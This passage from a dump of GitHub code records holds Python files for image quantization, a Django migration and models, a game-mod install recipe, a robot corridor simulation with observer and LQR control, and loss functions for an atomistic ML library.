cumulative_hist[m]))\r\n T = np.round(T)\r\n image = T[original.astype(np.uint8)]\r\n new_hist, bins = np.histogram(image, 256, (0, 255))\r\n image_float = image.astype(np.float64)\r\n image_float /= 255\r\n if is_rgb:\r\n original = rgb2yiq(im_orig)\r\n original[:, :, 0] = image_float[:, :, 0]\r\n return yiq2rgb(original), original_hist, new_hist\r\n\r\n else:\r\n return image_float, original_hist, new_hist\r\n\r\n\r\ndef quantize(im_orig, n_qaunt, n_iter):\r\n \"\"\"\r\n This function quantize a given image\r\n :param im_orig: The image in a matrix form\r\n :param n_qaunt: The number of colors we are given\r\n :param n_iter: The number of iterations we want\r\n :return: A tuple. The new image in a matrix form and the error rate of\r\n each iteration in an array.\r\n \"\"\"\r\n original = im_orig.copy()\r\n original_histogram, is_rgb = histogram_image(original)\r\n if is_rgb:\r\n original = np.floor(original * 255)\r\n error_list = []\r\n q_list = [0] * n_qaunt\r\n cumulative_hist = np.cumsum(original_histogram)\r\n\r\n z_list = [0] + [np.where(cumulative_hist >= i * (cumulative_hist[-1] / n_qaunt))[0][0]\r\n for i in range(1, n_qaunt)] + [255]\r\n\r\n for j in range(n_qaunt):\r\n lower_val = z_list[j] + 1\r\n upper_val = z_list[j + 1]\r\n g_val = np.arange(lower_val, upper_val + 1)\r\n q_list[j] = np.sum(g_val * original_histogram[lower_val: upper_val + 1]) / \\\r\n np.sum(original_histogram[lower_val: upper_val + 1])\r\n\r\n for i in range(n_iter):\r\n\r\n # compute the new z values\r\n temp_z = [0] + [(q_list[i-1] + q_list[i])/2 for i in range(1, n_qaunt)] + [255]\r\n\r\n # check z values\r\n if temp_z == z_list:\r\n break\r\n elif temp_z != z_list:\r\n z_list = temp_z\r\n # compute the new q values\r\n\r\n for j in range(n_qaunt):\r\n lower_val = int(z_list[j]) + 1\r\n upper_val = int(z_list[j + 1])\r\n g_val = np.arange(lower_val, upper_val + 1)\r\n q_list[j] = np.sum(g_val * original_histogram[lower_val: upper_val + 1]) /\\\r\n np.sum(original_histogram[lower_val: upper_val + 1])\r\n\r\n # compute the error value of this iteration\r\n error_rate = 0\r\n for k in range(n_qaunt):\r\n current_q = q_list[k]\r\n lower_val = int(z_list[k]) + 1\r\n upper_val = int(z_list[k + 1])\r\n g_values = np.arange(lower_val, upper_val+1)\r\n error_rate += np.sum(np.power(current_q-g_values, 2)*original_histogram[lower_val: upper_val + 1])\r\n\r\n error_list.append(error_rate)\r\n\r\n new_hist = np.array([0] * 256)\r\n\r\n for m in range(n_qaunt):\r\n lower_val = int(z_list[m])\r\n upper_val = int(z_list[m+1])\r\n new_hist[lower_val: upper_val+1] = np.floor(q_list[m])\r\n\r\n image = new_hist[original.astype(np.uint64)]\r\n\r\n image_float = image.astype(np.float64)\r\n image_float /= 255\r\n if is_rgb:\r\n im_orig = rgb2yiq(im_orig)\r\n im_orig[:, :, 0] = image_float[:, :, 0]\r\n return yiq2rgb(im_orig), error_list\r\n else:\r\n return image_float, error_list\r\n\r\n\r\nimages = []\r\njer_bw = read_image(r\"externals/jerusalem.jpg\", 1)\r\nimages.append((jer_bw, \"jerusalem grayscale\"))\r\njer_rgb = read_image(r\"externals/jerusalem.jpg\", 2)\r\nimages.append((jer_rgb, \"jerusalem RGB\"))\r\nlow_bw = read_image(r\"externals/low_contrast.jpg\", 1)\r\nimages.append((low_bw, \"low_contrast grayscale\"))\r\nlow_rgb = read_image(r\"externals/low_contrast.jpg\", 2)\r\nimages.append((low_rgb, \"low_contrast RGB\"))\r\nmonkey_bw = read_image(r\"externals/monkey.jpg\", 1)\r\nimages.append((monkey_bw, \"monkey grayscale\"))\r\nmonkey_rgb = read_image(r\"externals/monkey.jpg\", 2)\r\nimages.append((monkey_rgb, 
\"monkey RGB\"))\r\n\r\n\r\ndef test_rgb2yiq_and_yiq2rgb(im, name):\r\n \"\"\"\r\n Tests the rgb2yiq and yiq2rgb functions by comparing them to the built in ones in the skimage library.\r\n Allows error to magnitude of 1.e-3 (Difference from built in functions can't be bigger than 0.001).\r\n :param im: The image to test on.\r\n :param name: Name of image.\r\n :return: 1 on success, 0 on failure.\r\n \"\"\"\r\n imp = rgb2yiq(im)\r\n off = skimage.color.rgb2yiq(im)\r\n\r\n if not np.allclose(imp, off, atol=1.e-3):\r\n print(\"ERROR: in rgb2yiq on image '%s'\" % name)\r\n return 0\r\n imp2 = yiq2rgb(imp)\r\n off2 = skimage.color.yiq2rgb(off)\r\n if not np.allclose(imp2, off2, atol=1.e-3):\r\n print(\"ERROR: in yiq2rgb on image '%s'\" % name)\r\n return 0\r\n print(\"passed conversion test on '%s'\" % name)\r\n return 1\r\n\r\n\r\nfor im in images:\r\n if len(im[0].shape) == 3:\r\n result = test_rgb2yiq_and_yiq2rgb(im[0], im[1])\r\n if not result:\r\n print(\"=== Failed Conversion Test ===\")\r\n break\r\n\r\n\r\ndef display_all(im, add_bonus):\r\n if len(im.shape) == 3 and add_bonus:\r\n fig, a = plt.subplots(nrows=3, ncols=2)\r\n else:\r\n fig, a = plt.subplots(nrows=2, ncols=2)\r\n\r\n # adds the regular image\r\n a[0][0].imshow(im, cmap=plt.cm.gray)\r\n a[0][0].set_title(r\"original image\")\r\n\r\n # adds the quantified image\r\n quant = quantize(im, 3, 10)[0]\r\n a[0][1].imshow(quant, cmap=plt.cm.gray)\r\n a[0][1].set_title(r\"quantize to 3 levels, 10 iterations\")\r\n\r\n # adds the histogram equalized image\r\n hist = histogram_equalize(im)[0]\r\n a[1][0].imshow(hist, cmap=plt.cm.gray)\r\n a[1][0].set_title(\"histogram equalization\")\r\n\r\n # adds quantization on histogram equalized image\r\n hist_quant = quantize(hist, 6, 10)[0]\r\n a[1][1].imshow(hist_quant, cmap=plt.cm.gray)\r\n a[1][1].set_title(\"quantize on equalization\")\r\n\r\n # adds the bonus image\r\n # if len(im.shape) == 3 and add_bonus:\r\n # a[2][0].imshow(quantize_rgb(im, 3))\r\n # a[2][0].set_title(r\"bonus quantize_rgb\")\r\n\r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n for im in images:\r\n # change \"False\" to \"True\" if you wish to add the bonus task to the print\r\n display_all(im[0], False)\r\n # im = read_image(\"monkey.jpg\", 2)\r\n # yiq = rgb2yiq(im)\r\n # img = yiq2rgb(yiq)\r\n # x = np.hstack([np.repeat(np.arange(0, 50, 2), 10)[None, :], np.array([255] * 6)[None, :]])\r\n # x_normalize = x.astype(np.float64)\r\n # x_normalize /= 255\r\n # grad = np.tile(x_normalize, (256, 1))\r\n # result = histogram_equalize(grad)\r\n #\r\n # plt.imshow(result[0], cmap=plt.cm.gray)\r\n # plt.show()\r\n # after_quant = quantize(result[0], 5, 5)\r\n # # plt.show()\r\n # plt.imshow(after_quant[0], cmap=plt.cm.gray)\r\n # plt.show()\r\n # print(after_quant[1])\r\n # hist = histogram_image(after_quant[0])\r\n # print(hist[0])\r\n\r\n # imdisplay(\"monkey.jpg\", 2)\r\n # imdisplay(\"monkey.jpg\", 1)\r\n","repo_name":"yairabraham5/Image-processing","sub_path":"ex1-yairabraham5/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":10067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23189543404","text":"\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('modulector', '0020_auto_20210130_0317'),\n ]\n\n operations = [\n migrations.RunSQL(\"delete from MODULECTOR_URLTEMPLATE where name in ('quickgo', 'microrna', 'targetscan')\"),\n migrations.RunSQL(\"update 
MODULECTOR_URLTEMPLATE set name = 'mirbase' where name ='mirdb'\")\n\n ]\n","repo_name":"omics-datascience/modulector","sub_path":"modulector/migrations/0021_delete_url_templates.py","file_name":"0021_delete_url_templates.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"70398509804","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nimport uuid\n\n\nclass UserProfile(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n user = models.ForeignKey(User,on_delete=models.CASCADE)#username,email etc.\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n image = models.ImageField(upload_to='images/',blank=True,null=True)\n description = models.TextField(blank=True,null=True)\n birthday = models.DateField()\n\n def __str__(self):\n return str(self.user.username)\n\n\nclass Category(models.Model):\n \"\"\" Product has a category \"\"\"\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n name = models.CharField(max_length=200)\n def __str__(self):\n return str(self.name)\n \n\nclass Tag(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n \"\"\" Product has tag. For a better search operation \"\"\"\n name = models.CharField(max_length=200)\n def __str__(self):\n return str(self.name)\n\nclass Product(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n name = models.CharField(max_length=150)\n description = models.CharField(max_length=1500)\n price = models.PositiveIntegerField()\n category = models.ManyToManyField(Category,related_name=\"product_categories\")\n tags = models.ManyToManyField(Tag,related_name=\"product_tags\")\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n sold = models.BooleanField(default=False)\n #thumbnail = models.ImageField(upload_to=\"images/\",blank=True,null=True)\n\n def __str__(self):\n return str(self.name)\n \n def get_thumbnail(self,instance):\n images = instance.objects.filter(product=self)\n for image in images:\n if image.is_thumbnail:\n return image.image\n\n \n\n\n\nclass Comment(models.Model):\n \"\"\" Product has comment. 
To give an idea to users \"\"\"\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n user = models.OneToOneField(User,on_delete=models.CASCADE)\n product = models.OneToOneField(Product,on_delete=models.CASCADE)\n comment = models.CharField(max_length=500)\n\n def __str__(self):\n return str(self.comment)[:20]\n \n\n \n\nclass Point(models.Model):\n \"\"\" Product has a point that is given by users \"\"\"\n user = models.OneToOneField(User,on_delete=models.PROTECT)\n product = models.OneToOneField(Product,on_delete=models.CASCADE)\n value = models.PositiveSmallIntegerField(default=5, validators=[\n MaxValueValidator(5),\n MinValueValidator(1)\n ])\n\n def __str__(self):\n return f\"{self.user.username} : {self.product.name} -> {self.value}\"\n\nclass ProductImage(models.Model):\n \"\"\" Products can have multiple images \"\"\"\n product = models.ForeignKey(Product,on_delete=models.CASCADE)\n image = models.ImageField(upload_to = \"images/\")\n is_thumbnail = models.BooleanField(default=False)\n\n def __str__(self):\n return f\" image for {self.product.name}\"\n\nclass Basket(models.Model):\n user = models.ForeignKey(User,on_delete=models.CASCADE)\n products = models.ManyToManyField(Product,related_name=\"products_in_basket\")\n\n def __str__(self):\n return f\"{self.user}\"\n","repo_name":"yunusarli/Flopit","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2481939544","text":"import shutil\nimport pathlib\nfrom lib.utils import rm_rf\nfrom lib.recipes import Receipt\n\n\nclass adopted(Receipt):\n depends=[\"KOS\"]\n\n def __init__(self, game_dir, project_dir):\n super().__init__(game_dir, project_dir)\n\n def build(self):\n pass\n\n def can_install(self):\n return True\n\n def install(self):\n adopted_path = pathlib.Path().joinpath(\"adopted\").resolve()\n target_dir = self.game_dir.joinpath(\"GameData\", \"XyphosAerospace\")\n rm_rf(target_dir)\n shutil.copytree(adopted_path.joinpath(\n \"GameData\", \"XyphosAerospace\"), target_dir)\n target_dir = self.game_dir.joinpath(\"GameData\", \"IndicatorLightsCommunityExtensions\")\n rm_rf(target_dir)\n shutil.copytree(adopted_path.joinpath(\n \"GameData\", \"IndicatorLightsCommunityExtensions\"), target_dir)\n target_dir = self.game_dir.joinpath(\"GameData\", \"NFEOutdated\")\n rm_rf(target_dir)\n shutil.copytree(adopted_path.joinpath(\n \"GameData\", \"NFEOutdated\"), target_dir)\n\n def check_installed(self):\n target_dir = self.game_dir.joinpath(\"GameData\", \"XyphosAerospace\")\n return target_dir.exists()\n","repo_name":"untoldwind/kerbal-env","sub_path":"lib/recipes/adopted.py","file_name":"adopted.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38245707427","text":"#!/usr/bin/env python\n\n\"\"\"\nCreated on Tue Sep 15 10:37:53 2020\n\n@author: Guy\n\nImplements a dynamical system of a robot (double integrator) with a range sensor measuring\nits position relative to a wall. The measurements are not Normally distributed, but characterized\nwith the \"beam model\" (see \"Probabilistic Robotics\" chapter 6). 
The aim is to see the reachable \nsets of the system under given controls and this noise.\n\"\"\"\n\n# general stuff\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.integrate as spi\nimport scipy.interpolate as interpolate\nfrom scipy import stats\n\n#try:\n#\tfrom pydrake.all import LinearQuadraticRegulator\n#except:\n#\t# newer version of drake\nfrom pydrake.systems.controllers import LinearQuadraticRegulator\n\n# my helper classes\nfrom map_generator import MapGenerator\n\n# some behavioral control switches\ncontinuous = False\n#'const', 'linear', 'saw', 'sine', 'square', 'file'\nMap = MapGenerator(north_type='square', south_type='saw', center_type='const')\n\n# parameters of simulation\nconst_velocity = 0.5 # in x direction [m/sec]\nm = 1.0 # robot mass [Kg]\ndt = 0.01 # integration step time [sec]\nTmax = 10 # simulation time [sec]\nmeas_max = 6.0 # max measurement of the range sensor [m]\n\n# vector of measurements\n#sensor_array = np.array([90.]) # array of angles with respect to the x axis\nsensor_array = np.array([90., -90.]) # array of angles with respect to the x axis\n#sensor_array = np.array([90., 45., -45., -90.]) # array of angles with respect to the x axis\n\n# estimator memory variables\nz_est = np.array([[0.], [0.]]) # y, y'\nu_est = 0.\n# check via matlab or place some algorithm here to calculate the gains for each (A,C)\n# A = [0 1; 0 0]\n# C = [-1/sin(a1) 0; -1/sin(a2) 0 ....]\n# p = -2*pi*1*[cosd(45)+i*sind(45), -cosd(45)-i*sind(45)]\n# L = place(A',C',p).'\n#L = np.array([[-8.89], [-39.48]]) # [+90]; w=1Hz, zeta=0.7\nL = np.array([[-4.44, 4.44], [-19.74, 19.74]]) # [+90,-90]; w=1Hz, zeta=0.7\n#L = np.array([[-2.96,-2.10,2.10,2.96], [-13.16,-9.31,9.31,13.16]]) # [+90,+45,-45,-90]; w=1Hz, zeta=0.7\n\n# wall y location with respect to x. 
y_dir =1 if north wall, y_dir=-1 if south\ndef wall_y_location(x, y_dir=1.):\n\tif(y_dir > 0.):\n\t\treturn Map.north_wall(x)\n\telse:\n\t\treturn Map.south_wall(x)\n\n# state z has three components: z=[x, y, y'].\ndef plant(z, t):\n\tN_sensors = sensor_array.shape[0]\n\tmeas = np.zeros( [N_sensors, 1] )\n\tfor i, sensor in enumerate(sensor_array):\n\t\tnorth_wall = 1.0 \n\t\tif sensor < 0.:\n\t\t\tnorth_wall = -1.0\n\t\t# state feedback control (on y-position) is the distance to the wall\n\t\tideal_y = wall_y_location(z[0], y_dir=north_wall) - z[1]\n\t\tif(np.abs(sensor) <= 0.001):\n\t\t\t# case where there is a sensor heading in x direction\n\t\t\t# assume infinite wall so no wall is infront\n\t\t\tmeas[i][0] = meas_max\n\t\telse:\n\t\t\t# get the ideal ray to the wall\n\t\t\tideal_meas= ideal_y / np.sin(np.deg2rad(sensor))\n\t\t\t# get the new noise distribution (because it varies with the nominal meas.)\n\t\t\tpdf, bins = noise_dist(ideal_meas, a1=.3, a2=0.1, a3=.1, a4=.04, norm_sig=0.1)\n\t\t\t# only Gaussian noise (for debug)\n\t\t\t# pdf, bins = noise_dist(ideal_meas, a1=.3, a2=0., a3=0., a4=0., norm_sig=0.1)\n\t\t\t# sample a new measurement from the inverse cdf using a uniform random number in [0,1]\n\t\t\tmeas[i][0] = inverse_transform_sampling(pdf, bins) \n\n\t# output feedback control\n\tu = control(Map.center_line(z[0]), meas, z[0])\n\t\n\t'''\n\t# discretized\n zdot[0] = z[0] + 0 + 0 + dt * const_velocity\n zdot[1] = 0 + z[1] + dt * z[2] + dt*dt/(2.*m) * u\n\tzdot[2] = 0 + 0 + z[2] + dt/m * u\n\t'''\n\tzdot = z.copy()\n\tzdot[0] = const_velocity # x' = v_const\n\tzdot[1] = z[2] # y' = y'\n\tzdot[2] = 1./m * u # m*y'' = u\n\t\n # We return z'=[x', y', y''] and measured output y\n\treturn zdot, meas\n\n# state estimation (pole placement) + state feedback (LQR). \n#ref- y to be in. meas- the measurements vector. x- just for the wall function\ndef control(ref, meas, x):\n\tglobal z_est\n\tglobal u_est\n\tglobal L\n\t\n\t# observer gain (only for 1 measurement, if you have more, compute in matlab).\n\t#wn = 2.*np.pi*1. 
# 1Hz observer\n\t#xi = 0.7 # damping factor\n\t#LL = np.array([[-2.*xi*wn], [-wn*wn]]) # pole-placement\n\t\n\t# create the range estimation for each sensor\n\tN_sensors = meas.shape[0]\n\tmeas_est = np.zeros( [N_sensors, 1] )\n\tfor i, sensor in enumerate(sensor_array):\n\t\tnorth_wall = 1.0 \n\t\tif sensor < 0.:\n\t\t\tnorth_wall = -1.0\n\t\ty_est = wall_y_location(x, y_dir=north_wall) - z_est[0][0]\n\t\tif(np.abs(sensor) < 0.001):\n\t\t\tmeas_est[i][0] = np.inf\n\t\telse:\n\t\t\tmeas_est[i][0] = y_est / np.sin(np.deg2rad(sensor))\n\t\t\n\t# Luenberger Observer\n\tf = np.array([[z_est[1][0]], \\\n\t\t\t\t [1./m * u_est] ])\n\t# Estimator equations\n\tzdot_est = f + L.dot(meas - meas_est)\n\t# Euler integration\n\tz_est = z_est + dt * zdot_est\n\t\n\t# now we can do state feedback control (x-axis doesn't really play here)\n\tAf = np.array([[0.,1.], [0.,0.]])\n\tBf = np.array([[0.], [1./m]])\n\tQ = np.eye(2)\n\tR = np.eye(1)\n\tKf, Qf = LinearQuadraticRegulator(Af, Bf, Q, R)\n\t\n\tu_est = ref - Kf.dot(z_est)[0][0]\n\t# do nothing (for debug)\n\t#u_est = 0.\n\t\n\treturn u_est\n\n# implements the noise pdf of the beam model and allows some parameters to be set\ndef noise_dist(x_true, a1=1., a2=1., a3=1., a4=.1, norm_sig=1., exp_lambda=1., uni_delta=0.5, plot=False):\n\tN = 100\n\t\n\t# the discretization of the space (bins)\n\tx = np.linspace(0, meas_max, N)\n\t# -x_true because we shift it and for some reason it looks at the truncated dist before shift :(\n\trv_norm = stats.truncnorm(-x_true, meas_max-x_true, loc=x_true, scale=norm_sig) \n\trv_exp = stats.expon()\n\trv_uni = stats.uniform()\n\t\n\t# the beam model pdf (see prob. robotics book ch. 6)\n\tpdf = a1 * rv_norm.pdf(x) + \\\n\t\t a2 * rv_exp.pdf(exp_lambda*x)*exp_lambda + \\\n\t\t a3 * rv_uni.pdf((x-0.)/meas_max)/meas_max + \\\n\t\t a4 * rv_uni.pdf((x-(meas_max-uni_delta))/uni_delta)/uni_delta\n\n\tif(plot):\n\t\t# plot the dist for debugging\n\t\tfig, ax = plt.subplots(1, 1)\n\t\tax.plot(x, pdf)\n\t\tplt.title('p(x) for the beam model')\n\t\tplt.show(block=False)\n\t\t\n\treturn pdf, x\n\n# both creates the inverse cdf and samples and returns numbers from this distribution\ndef inverse_transform_sampling(pdf, bin_edges, n_samples=1):\n\t#import pdb; pdb.set_trace()\n\t# this sort of creates the histogram by taking to adjacent pdf values and averaging them for every bin\n\tpdf = 0.5 * ( pdf[:-1] + pdf[1:] )\n\t# construct the CDF\n\tcum_values = np.zeros(bin_edges.shape)\n\tcum_values[1:] = np.cumsum(pdf*np.diff(bin_edges))\n\t# normalize to a standard distribution because it wasn't done before\n\tcum_values = cum_values/cum_values[-1] \n\t\n\tinv_cdf = interpolate.interp1d(cum_values, bin_edges)\n\t# u in [0,1]\n\tu = np.random.rand(n_samples)\n\t# return the function for later use\n\treturn inv_cdf(u)\n\ndef simulate_c():\n\t# We want to evaluate the system on N linearly spaced times between t=0 and t=Tmax.\n\tt = np.linspace(0., 10., Tmax)\n\t# The initial position is (0, 0).\n\tz0 = np.zeros(3)\n\t\n\t# We simulate the system and evaluate z\n\tz = spi.odeint(plant, z0, t, args=(k,))\n\t\n\treturn t, z\n\n# implements a standard Euler integration steps in a loop\ndef simulate_d():\n\tglobal z_est\n\tglobal u_est\n\tz_est = np.array([[0.], [0.]])\n\tu_est = 0.\n\t\n\t# We want to evaluate the system on N linearly spaced times between t=0 and t=10.\n\tt_vec = np.arange(0., Tmax, dt)\n\t# The initial position is (0, 0).\n\t#z = np.array([0., 0., 0.])\n\tz = np.array([0., 1., 0.])\n\tz_save, z_est_save, u_save, meas_save = [], 
[], [], []\n\t\n\tN_sensors = sensor_array.shape[0]\n\n\t# We simulate the system and evaluate z\n\tfor t in t_vec:\n\t\t# get the derivatives\n\t\tzdot, meas = plant(z, t)\n\t\t# Euler integration\n\t\tz = z + dt * zdot \n\t\t# save for telemetry\n\t\tif(len(z_save) == 0):\n\t\t\tz_save = np.array([z])\n\t\t\tz_est_save = np.array(z_est.reshape((1,2))) # only save y,y' at the moment\n\t\t\tmeas_save = np.array(meas.reshape((1,N_sensors)))\n\t\t\tu_save = np.array([u_est])\n\t\telse:\n\t\t\tz_save = np.vstack([z_save, z])\n\t\t\tmeas_save = np.vstack([meas_save, meas.reshape((1,N_sensors))])\n\t\t\tz_est_save = np.vstack([z_est_save, z_est.reshape((1,2))])\n\t\t\tu_save = np.vstack([u_save, u_est])\n\t\n\treturn t_vec, z_save, meas_save, z_est_save, u_save\n\ndef single_run():\n\tif(continuous):\n\t\tt, state = simulate_c()\n\telse:\n\t\tt, state, meas, state_est, controls = simulate_d()\n\n\t# plot the dist for debugging\n\t#pdf, bins = noise_dist(3.0, a1=.5, a2=0.1, a3=.3, a4=.04)\n\tpdf, bins = noise_dist(3.0, a1=.3, a2=0.1, a3=.1, a4=.04, norm_sig=0.1, plot=True)\n\n\t# visualizations\n\tfig, (ax1, ax2) = plt.subplots(2, 1, sharex=True)\n\n\tax1.plot(t, state[:, 1], label='$y(t)$')\n\tax1.plot(t, state_est[:, 0], label='$\\^y(t)$')\n\tax2.plot(t, controls[:], label='$u_y(t)$', alpha=0.2)\n\n\t# walls\n\tn_wall, s_wall = [], []\n\tfor i in range(len(t)):\n\t\tn_wall.append( wall_y_location(state[i, 0], y_dir=1.0) )\n\t\ts_wall.append( wall_y_location(state[i, 0], y_dir=-1.0 ) )\n\t\n\tfor i, sensor in enumerate(sensor_array):\n\t\tif sensor > 0.:\n\t\t\tax1.plot(t, n_wall - meas[:,i]*np.sin(np.deg2rad(sensor)), \\\n\t\t\t\t\tlabel='$\\^y(sensor_%d)$'%i, marker='o', linestyle='', alpha=0.2)\n\t\telse:\n\t\t\tax1.plot(t, s_wall - meas[:,i]*np.sin(np.deg2rad(sensor)), \\\n\t\t\t\t\tlabel='$\\^y(sensor_%d)$'%i, marker='o', linestyle='', alpha=0.2)\n\n\t#ax.plot([t[0], t[-1]], [3., 3.], label='north wall', color='k', linewidth=6)\n\tax1.plot(t, n_wall, label='north wall', color='k', linewidth=6)\n\t#ax.plot([t[0], t[-1]], [-3., -3.], label='south wall', color='k', linewidth=6)\n\tax1.plot(t, s_wall, label='south wall', color='k', linewidth=6)\n\tax1.legend(loc='upper right')\n\tax1.set_title('state vs. time (%d sensors)'%(len(sensor_array)))\n\tax2.legend(loc='upper right')\n\tax2.set_title('controls vs. time')\n\tax1.set_xlim(t[0], t[-1])\n\tax1.set_ylim(-np.max(np.abs(n_wall)), np.max(np.abs(n_wall)))\n\t\n\tfig, ax3 = plt.subplots(1, 1)\n\tax3.plot(state[:, 0], state[:, 1], label='$robot$')\n\tax3.plot(state[:, 0], n_wall, label='north wall', color='k', linewidth=6)\n\tax3.plot(state[:, 0], s_wall, label='south wall', color='k', linewidth=6)\n\tax3.legend(loc='upper right')\n\tax3.set_title('Robot in workspace')\n\t\n\tplt.show() #block=True)\n\t\ndef multi_run(n=10):\n\t# visualizations\n\tfig, ax3 = plt.subplots(1, 1)\n\n\tfor idx in range(n):\n\t\tt, state, meas, state_est, controls = simulate_d()\n\t\tprint('finished run #%d' %(idx))\n\t\tax3.plot(state[:, 0], state[:, 1], label='$%d$'%(idx), alpha=0.2)\n\t\n\t# walls\n\tn_wall, s_wall = [], []\n\tfor i in range(len(t)):\n\t\tn_wall.append( wall_y_location(state[i, 0]) )\n\t\ts_wall.append( -3. 
)\n\tax3.plot(state[:, 0], n_wall, label='north wall', color='k', linewidth=6)\n\tax3.plot(state[:, 0], s_wall, label='south wall', color='k', linewidth=6)\n\tax3.legend()\n\tax3.set_title('Robot in workspace')\n\n\tplt.show()\n\n\nif __name__ == \"__main__\":\n\t\n\tsingle_run()\n\t#multi_run()\n","repo_name":"sguysc/Perception_verification","sub_path":"simulate_dbl_int_in_corridor_numpy.py","file_name":"simulate_dbl_int_in_corridor_numpy.py","file_ext":"py","file_size_in_byte":10703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71566940843","text":"import dataclasses\nfrom typing import List\n\nimport einops\nimport jax.numpy as jnp\n\nfrom apax.utils.math import normed_dotp\n\n\ndef weighted_squared_error(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n) -> jnp.array:\n \"\"\"\n Squared error function that allows weighting of\n individual contributions by the number of atoms in the system.\n \"\"\"\n return (label - prediction) ** 2 / divisor\n\n\ndef force_angle_loss(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n) -> jnp.array:\n \"\"\"\n Cosine similarity loss function. Contributions are summed in `Loss`.\n \"\"\"\n dotp = normed_dotp(label, prediction)\n return (1.0 - dotp) / divisor\n\n\ndef force_angle_div_force_label(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n):\n \"\"\"\n Cosine similarity loss function weighted by the norm of the force labels.\n Contributions are summed in `Loss`.\n \"\"\"\n dotp = normed_dotp(label, prediction)\n F_0_norm = jnp.linalg.norm(label, ord=2, axis=2, keepdims=False)\n loss = jnp.where(F_0_norm > 1e-6, (1.0 - dotp) / F_0_norm, jnp.zeros_like(dotp))\n return loss\n\n\ndef force_angle_exponential_weight(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n) -> jnp.array:\n \"\"\"\n Cosine similarity loss function exponentially scaled by the norm of the force labels.\n Contributions are summed in `Loss`.\n \"\"\"\n dotp = normed_dotp(label, prediction)\n F_0_norm = jnp.linalg.norm(label, ord=2, axis=2, keepdims=False)\n return (1.0 - dotp) * jnp.exp(-F_0_norm) / divisor\n\n\nloss_functions = {\n \"molecules\": weighted_squared_error,\n \"structures\": weighted_squared_error,\n \"vibrations\": weighted_squared_error,\n \"cosine_sim\": force_angle_loss,\n \"cosine_sim_div_magnitude\": force_angle_div_force_label,\n \"cosine_sim_exp_magnitude\": force_angle_exponential_weight,\n}\n\n\n@dataclasses.dataclass\nclass Loss:\n \"\"\"\n Represents a single weighted loss function that is constructed from a `name`\n and a type of comparison metric.\n \"\"\"\n\n name: str\n loss_type: str\n weight: float = 1.0\n\n def __post_init__(self):\n if self.loss_type not in loss_functions.keys():\n raise NotImplementedError(\n f\"the loss function '{self.loss_type}' is not known.\"\n )\n\n if self.name not in [\"energy\", \"forces\", \"stress\"]:\n raise NotImplementedError(f\"the quantity '{self.name}' is not known.\")\n self.loss_fn = loss_functions[self.loss_type]\n\n def __call__(self, inputs: dict, prediction: dict, label: dict) -> float:\n # TODO we may want to insert an additional `mask` argument for this method\n divisor = self.determine_divisor(inputs[\"n_atoms\"])\n loss = self.loss_fn(label[self.name], prediction[self.name], divisor=divisor)\n return self.weight * jnp.sum(jnp.mean(loss, axis=0))\n\n def determine_divisor(self, n_atoms: jnp.array) -> jnp.array:\n divisor_id = self.name + \"_\" + self.loss_type\n divisor_dict 
= {\n \"energy_structures\": n_atoms**2,\n \"energy_vibrations\": n_atoms,\n \"forces_structures\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n \"forces_cosine_sim\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n \"cosine_sim_div_magnitude\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n \"forces_cosine_sim_exp_magnitude\": einops.repeat(\n n_atoms, \"batch -> batch 1 1\"\n ),\n \"stress_structures\": einops.repeat(n_atoms**2, \"batch -> batch 1 1\"),\n \"stress_vibrations\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n }\n divisor = divisor_dict.get(divisor_id, jnp.array(1.0))\n\n return divisor\n\n\n@dataclasses.dataclass\nclass LossCollection:\n loss_list: List[Loss]\n\n def __call__(self, inputs: dict, predictions: dict, labels: dict) -> float:\n total_loss = 0.0\n for single_loss_fn in self.loss_list:\n loss = single_loss_fn(inputs, predictions, labels)\n total_loss = total_loss + loss\n\n return total_loss\n","repo_name":"apax-hub/apax","sub_path":"apax/train/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"18905115919","text":"# -*- coding: utf-8 -*-\r\n# Rodrigo - Prova 3, Area Inferior, 1188\r\nOperacao = str(input()) #Input da operação.\r\n\r\nsoma = 0 #Armazenará a soma dos elementos da matriz.\r\nM = [[' ']*12]*12 #Criação da matriz 12x12\r\nfor i in range(0, 12): #Dois For's que vão percorrer a matriz 12x12 e somar os elementos.\r\n for j in range(0, 12):\r\n M[i][j] = float(input())\r\n if (i >= 7) and (j <= i - 1) and (j >= 12 - i) 